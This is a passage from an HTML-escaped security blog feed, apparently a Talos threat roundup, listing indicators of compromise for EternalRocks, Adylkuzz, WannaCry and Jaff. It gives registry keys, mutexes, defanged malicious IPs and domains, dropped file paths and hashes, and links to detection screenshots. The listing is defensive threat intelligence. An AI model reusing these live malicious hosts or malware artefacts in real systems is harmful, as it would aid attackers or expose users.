&lt;/b&gt;ProxyOverride&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\Software\Microsoft\SystemCertificates\My&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\Software\Wow6432Node\Microsoft\EnterpriseCertificates\Root&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUST\Certificates&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\Certificates&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\Wow6432Node&lt;/b&gt;&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Global\20b70e57-1c2e-4de9-99e5-69f369006912&lt;/li&gt;&lt;li&gt;\BaseNamedObjects\Global\20b70e57-1c2e-4de9-99e5-69f369006912&lt;/li&gt;&lt;li&gt;{8F6F0AC4-B9A1-45fd-A8CF-72FDEFF}&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;cs9[.]wpc[.]v0cdn[.]net&lt;/li&gt;&lt;li&gt;archive[.]torproject[.]org&lt;/li&gt;&lt;li&gt;api[.]nuget[.]org&lt;/li&gt;&lt;li&gt;listera[.]torproject[.]org&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;64442cceb7d618e70c62d461cfaafdb8e653b8d98ac4765a6b3d8fd1ea3bce15&lt;/li&gt;&lt;li&gt;94189147ba9749fd0f184fe94b345b7385348361480360a59f12adf477f61c97&lt;/li&gt;&lt;li&gt;ad8965e531424cb34120bf0c1b4b98d4ab769bed534d9a36583364e9572332fa&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a
href="https://1.bp.blogspot.com/-V6cub50HJ5A/WShYbcIEE6I/AAAAAAAABBY/Z08thzCMNzw9Mqz4gEHmmvsW93MQyMRhQCLcB/s1600/no-email-security.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1195" data-original-width="1600" height="297" src="https://1.bp.blogspot.com/-V6cub50HJ5A/WShYbcIEE6I/AAAAAAAABBY/Z08thzCMNzw9Mqz4gEHmmvsW93MQyMRhQCLcB/s400/no-email-security.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-FlvBh8WoBDg/WShYu4VAX6I/AAAAAAAABBc/E7_wOJc1fEAUdEbYgiIxifWVyH2R5i-9gCLcB/s1600/Win_Trojan_EternalRocks1_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="416" data-original-width="616" height="216" src="https://3.bp.blogspot.com/-FlvBh8WoBDg/WShYu4VAX6I/AAAAAAAABBc/E7_wOJc1fEAUdEbYgiIxifWVyH2R5i-9gCLcB/s320/Win_Trojan_EternalRocks1_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-hcK1Eymz2hw/WShYywgOy5I/AAAAAAAABBg/pIi00-nam30rkz_-2nmTjkb7nr57bmUiQCLcB/s1600/Win_Trojan_EternalRocks1_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1057" data-original-width="1600" height="263" src="https://4.bp.blogspot.com/-hcK1Eymz2hw/WShYywgOy5I/AAAAAAAABBg/pIi00-nam30rkz_-2nmTjkb7nr57bmUiQCLcB/s400/Win_Trojan_EternalRocks1_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br 
/&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-a3FhhsXx1FY/WShY2yqUraI/AAAAAAAABBk/3nYCinWGoB8Q0e_d8a14oy7zMrMrkxtpACLcB/s1600/Win_Trojan_EternalRocks1_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="731" data-original-width="1600" height="182" src="https://1.bp.blogspot.com/-a3FhhsXx1FY/WShY2yqUraI/AAAAAAAABBk/3nYCinWGoB8Q0e_d8a14oy7zMrMrkxtpACLcB/s400/Win_Trojan_EternalRocks1_umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Screenshot&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-y-xtF--3a_I/WShY_hOn6-I/AAAAAAAABBo/7V-l5-tSu6Ahe3xzFda1m6k5nQJwB3m8wCLcB/s1600/Win_Trojan_EternalRocks1_malware11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="768" data-original-width="1024" height="300" src="https://4.bp.blogspot.com/-y-xtF--3a_I/WShY_hOn6-I/AAAAAAAABBo/7V-l5-tSu6Ahe3xzFda1m6k5nQJwB3m8wCLcB/s400/Win_Trojan_EternalRocks1_malware11.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.Adylkuzz-6317076-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;RasPbFile&lt;/li&gt;&lt;li&gt;Global\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br 
/&gt;&lt;ul&gt;&lt;li&gt;4[.]14[.]36[.]139&lt;/li&gt;&lt;li&gt;212[.]83[.]129[.]195&lt;/li&gt;&lt;li&gt;52[.]173[.]193[.]166&lt;/li&gt;&lt;li&gt;212[.]129[.]46[.]87&lt;/li&gt;&lt;li&gt;45[.]77[.]28[.]163&lt;/li&gt;&lt;li&gt;112[.]139[.]223[.]108&lt;/li&gt;&lt;li&gt;212[.]129[.]46[.]191&lt;/li&gt;&lt;li&gt;212[.]129[.]44[.]155&lt;/li&gt;&lt;li&gt;212[.]129[.]44[.]157&lt;/li&gt;&lt;li&gt;212[.]129[.]44[.]156&lt;/li&gt;&lt;li&gt;45[.]76[.]51[.]128&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;icanhazip[.]com&lt;/li&gt;&lt;li&gt;aa1[.]super5566[.]com&lt;/li&gt;&lt;li&gt;xmr[.]crypto-pool[.]fr&lt;/li&gt;&lt;li&gt;08[.]super5566[.]com&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%WinDir%\Fonts\wuauser.exe&lt;/li&gt;&lt;li&gt;%WinDir%\Fonts\id.txt&lt;/li&gt;&lt;li&gt;%WinDir%\Temp\s1vs._Miner_.log&lt;/li&gt;&lt;li&gt;%WinDir%\Fonts\msiexev.exe&lt;/li&gt;&lt;li&gt;%WinDir%\Temp\s1vs.1_.exe&lt;/li&gt;&lt;li&gt;%WinDir%\Fonts\history.txt&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;8200755cbedd6f15eecd8207eba534709a01957b172d7a051b9cc4769ddbf233&lt;/li&gt;&lt;li&gt;6f74f7c01503913553b0a6118b0ea198c5a419be86fca4aaae275663806f68f3&lt;/li&gt;&lt;li&gt;d73c9230811f1075d5697679b6007f5c15a90177991e238c5adc3ed55ce04988&lt;/li&gt;&lt;li&gt;51d435cf247b602c104b8d1fb275918c1fa7395a138b26a8aef77b40bf3f09ba&lt;/li&gt;&lt;li&gt;c2d982b902af50dd01f299d2220314000ea319b836af33f8006a813b9b2cfb17&lt;/li&gt;&lt;li&gt;da22bc77a46f2235f6e399a4bb175488bf7d71912f03ff72a34a7515ef13e11b&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" 
src="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-78i0TpRCx2E/WShZKtB8MmI/AAAAAAAABBs/LQ9tt-Z_KnwMMbmQfg4qFY-E_6FpGTwugCLcB/s1600/Win_Trojan_Adylkuzz_6317076_0_amp1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="742" data-original-width="654" height="320" src="https://4.bp.blogspot.com/-78i0TpRCx2E/WShZKtB8MmI/AAAAAAAABBs/LQ9tt-Z_KnwMMbmQfg4qFY-E_6FpGTwugCLcB/s320/Win_Trojan_Adylkuzz_6317076_0_amp1.png" width="282" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-trMzmgUO1OQ/WShZXEJgZjI/AAAAAAAABBw/CS10iVtvYVo3hv85UcBA0_0eFt_xduYrwCLcB/s1600/Win_Trojan_Adylkuzz_6317076_0_threatgrid1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1256" data-original-width="1600" height="313" src="https://2.bp.blogspot.com/-trMzmgUO1OQ/WShZXEJgZjI/AAAAAAAABBw/CS10iVtvYVo3hv85UcBA0_0eFt_xduYrwCLcB/s400/Win_Trojan_Adylkuzz_6317076_0_threatgrid1.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-N24NhcoZnYU/WShZcIMnUkI/AAAAAAAABB0/mOLC1mxM9u8DHDWYNH5yNkN7t2F3V_37ACLcB/s1600/Win_Trojan_Adylkuzz_6317076_0_umbrella1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img 
border="0" data-original-height="520" data-original-width="1600" height="130" src="https://4.bp.blogspot.com/-N24NhcoZnYU/WShZcIMnUkI/AAAAAAAABB0/mOLC1mxM9u8DHDWYNH5yNkN7t2F3V_37ACLcB/s400/Win_Trojan_Adylkuzz_6317076_0_umbrella1.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-20GmDNhlt1w/WShZg2SENWI/AAAAAAAABB4/fb30Hz5m-t8HYU7neIcVy32daYSMtnWPACLcB/s1600/Win_Trojan_Adylkuzz_6317076_0_umbrella2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="598" data-original-width="1600" height="148" src="https://1.bp.blogspot.com/-20GmDNhlt1w/WShZg2SENWI/AAAAAAAABB4/fb30Hz5m-t8HYU7neIcVy32daYSMtnWPACLcB/s400/Win_Trojan_Adylkuzz_6317076_0_umbrella2.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Screenshot&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-phHa6Pu1-Ks/WShZlvdBaHI/AAAAAAAABB8/VmXa6lrz-_8jNeiW2jIr1GP95k2qHMIxgCLcB/s1600/Win_Trojan_Adylkuzz_6317076_0_malware1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="768" data-original-width="1024" height="300" src="https://1.bp.blogspot.com/-phHa6Pu1-Ks/WShZlvdBaHI/AAAAAAAABB8/VmXa6lrz-_8jNeiW2jIr1GP95k2qHMIxgCLcB/s400/Win_Trojan_Adylkuzz_6317076_0_malware1.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Ransomware.WannaCry&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\CONTROL PANEL\DESKTOP&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: 
&lt;/b&gt;Wallpaper&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\Software\WanaCrypt0r&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\Software\Wow6432Node\WanaCrypt0r&lt;/b&gt;&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;MsWinZonesCacheCounterMutexA&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[[.]]com&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%SystemDrive%\b.wnry&lt;/li&gt;&lt;li&gt;%SystemDrive%\c.wnry&lt;/li&gt;&lt;li&gt;%SystemDrive%\r.wnry&lt;/li&gt;&lt;li&gt;%SystemDrive%\s.wnry&lt;/li&gt;&lt;li&gt;%SystemDrive%\taskdl.exe&lt;/li&gt;&lt;li&gt;%SystemDrive%\taskse.exe&lt;/li&gt;&lt;li&gt;%SystemDrive%\t.wnry&lt;/li&gt;&lt;li&gt;%SystemDrive%\u.wnry&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25&lt;/li&gt;&lt;li&gt;24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c&lt;/li&gt;&lt;li&gt;4186675cb6706f9d51167fb0f14cd3f8fcfb0065093f62b10a15f7d9a6c8d982&lt;/li&gt;&lt;li&gt;4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79&lt;/li&gt;&lt;li&gt;1be0b96d502c268cb40da97a16952d89674a9329cb60bac81a96e01cf7356830&lt;/li&gt;&lt;li&gt;2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d&lt;/li&gt;&lt;li&gt;d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa&lt;/li&gt;&lt;li&gt;402751fa49e0cb68fe052cb3db87b05e71c1d950984d339940cf6b29409f2a7c&lt;/li&gt;&lt;li&gt;055c7760512c98c8d51e4427227fe2a7ea3b34ee63178fe78631fa8aa6d15622&lt;/li&gt;&lt;li&gt;e18fdd912dfe5b45776e68d578c3af3547886cf1353d7086c8bee037436dff4b&lt;/li&gt;&lt;li&gt;97ebce49b14c46bebc9ec2448d00e1e397123b256e2be9eba5140688e7bc0ae6&lt;/li&gt;&lt;/ul&gt;&lt;br 
/&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-V6cub50HJ5A/WShYbcIEE6I/AAAAAAAABBY/abZn6c42_GIrFkZYMNwtHIcMHfx62oUVgCEw/s1600/no-email-security.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1195" data-original-width="1600" height="238" src="https://2.bp.blogspot.com/-V6cub50HJ5A/WShYbcIEE6I/AAAAAAAABBY/abZn6c42_GIrFkZYMNwtHIcMHfx62oUVgCEw/s320/no-email-security.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-g9Gf-ZOTYoM/WShZ3H63zxI/AAAAAAAABCA/1KkrnTkMawsjgFbwbTVuCe7VHlCnSkd6ACLcB/s1600/Win_Ransomware_WannaCry_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="263" data-original-width="367" height="229" src="https://1.bp.blogspot.com/-g9Gf-ZOTYoM/WShZ3H63zxI/AAAAAAAABCA/1KkrnTkMawsjgFbwbTVuCe7VHlCnSkd6ACLcB/s320/Win_Ransomware_WannaCry_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-xeP4QeLANaA/WShZ8n7RznI/AAAAAAAABCE/ZtXUZ1XCD5ot8xKoCCtmjRDpqQ7i_eR2QCLcB/s1600/Win_Ransomware_WannaCry_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="394" data-original-width="1223" height="128" src="https://3.bp.blogspot.com/-xeP4QeLANaA/WShZ8n7RznI/AAAAAAAABCE/ZtXUZ1XCD5ot8xKoCCtmjRDpqQ7i_eR2QCLcB/s400/Win_Ransomware_WannaCry_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br 
/&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Screenshot&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-cDuo4zpaP4Y/WRYwqS84LFI/AAAAAAAAA_4/Mjc4NrbR0XoKFcVGSlrNS_aiWGrvgAxxwCPcB/s1600/image8.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="976" data-original-width="1300" height="300" src="https://3.bp.blogspot.com/-cDuo4zpaP4Y/WRYwqS84LFI/AAAAAAAAA_4/Mjc4NrbR0XoKFcVGSlrNS_aiWGrvgAxxwCPcB/s400/image8.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Ransomware.Jaff&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;84[.]242[.]240[.]62&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;panaceya-n[.]ru&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;\TEMP\ratchet20.exe&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br 
/&gt;&lt;ul&gt;&lt;li&gt;03363f9f6938f430a58f3f417829aa3e98875703eb4c2ae12feccc07fff6ba47&lt;/li&gt;&lt;li&gt;d8bb054fa738d7ba1b88f65e2b7dcf40a234bec8ec318e472380b603ed9ba0dc&lt;/li&gt;&lt;li&gt;b9434c5fd5eefb8fb182024ecd3da4888222cae8a230fc0a778a7b712746f9f3&lt;/li&gt;&lt;li&gt;64580b7bb2eedf6e2d2f5e773b34a62f5065c4cb167cd4ed0791050f425c546e&lt;/li&gt;&lt;li&gt;8dbaab384ecd5386d960d1dddd7fd50ab3a30389dd5b8e516c5d873d77a1bbf9&lt;/li&gt;&lt;li&gt;aca726cb504599206e66823ff2863eb80c6a5f16ff71ca9fcdd907ad39b2d852&lt;/li&gt;&lt;li&gt;341267f4794a49e566c9697c77e974a99e41445cf41d8387040049ee1b8b2f3b&lt;/li&gt;&lt;li&gt;e081c4557f4153d2fc9102fabc55aa6acdf8e1e11062529c728f4506b0d981b9&lt;/li&gt;&lt;li&gt;5f1fcdfb951dc4642ce136a5d3e6bc42021f8e0cd631975a5eb3842da020531c&lt;/li&gt;&lt;li&gt;0746594fc3e49975d3d94bac8e80c0cdaa96d90ede3b271e6f372f55b20bac2f&lt;/li&gt;&lt;li&gt;f61d07cd7d32a6cb9ead8e82f43ef84cf54a89ef571d9b2a9cb0ecaf5319f5db&lt;/li&gt;&lt;li&gt;387812ee2820cbf49812b1b229b7d8721ee37296f7b6018332a56e30a99e1092&lt;/li&gt;&lt;li&gt;a0f72a7e67bfed40031c52a706b45de3787958729a308b5f15e754341022ed8e&lt;/li&gt;&lt;li&gt;6b5759c6c3d7c7c21859023b4fcc443aa5343759a7a08c3870c5269e5c34a958&lt;/li&gt;&lt;li&gt;94195aa110563ab1bd2542fb71806df5921c4c730036aa8faeaf537dcc01162c&lt;/li&gt;&lt;li&gt;2bc87f1bbfdb23fe503ef89bcbf6908ffd7218433e0fbfa51282c0dc51dece01&lt;/li&gt;&lt;li&gt;d1537972d7ac8f5f7c675c14027336715cb0bf91fe440d792e990d0efbd52710&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots 
of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-S5IWk9TNbiQ/WShaU6GpImI/AAAAAAAABCI/lftVS-4o1TUPByXLoQu81Rj6CnIL7ES7wCLcB/s1600/jaff_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="241" data-original-width="351" height="218" src="https://4.bp.blogspot.com/-S5IWk9TNbiQ/WShaU6GpImI/AAAAAAAABCI/lftVS-4o1TUPByXLoQu81Rj6CnIL7ES7wCLcB/s320/jaff_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-bFKeMZsCk8A/WShaX1nzwpI/AAAAAAAABCM/t0EVWxVaZHw9UgV-E1_Y9S11b0xZT_mwgCLcB/s1600/jaff_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="297" data-original-width="961" height="122" src="https://4.bp.blogspot.com/-bFKeMZsCk8A/WShaX1nzwpI/AAAAAAAABCM/t0EVWxVaZHw9UgV-E1_Y9S11b0xZT_mwgCLcB/s400/jaff_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-FM2j_idLbxg/WShacNICajI/AAAAAAAABCQ/1jUCAoJj424tNOVy3W4B9ioJAA1NfxvWgCLcB/s1600/jaff_investigate.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="333" data-original-width="827" height="160" src="https://1.bp.blogspot.com/-FM2j_idLbxg/WShacNICajI/AAAAAAAABCQ/1jUCAoJj424tNOVy3W4B9ioJAA1NfxvWgCLcB/s400/jaff_investigate.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Screenshot&lt;/b&gt;&lt;br /&gt;&lt;div 
class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-M5Mkzzbesqk/WShafnbWQJI/AAAAAAAABCU/nAp81DoPLy8eC5fMiftZvVRiyV9_kJ0hQCLcB/s1600/jaff_screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="737" data-original-width="1002" height="293" src="https://4.bp.blogspot.com/-M5Mkzzbesqk/WShafnbWQJI/AAAAAAAABCU/nAp81DoPLy8eC5fMiftZvVRiyV9_kJ0hQCLcB/s400/jaff_screenshot.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=ap40FDe81Ss:jIyh8_zuGiw:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
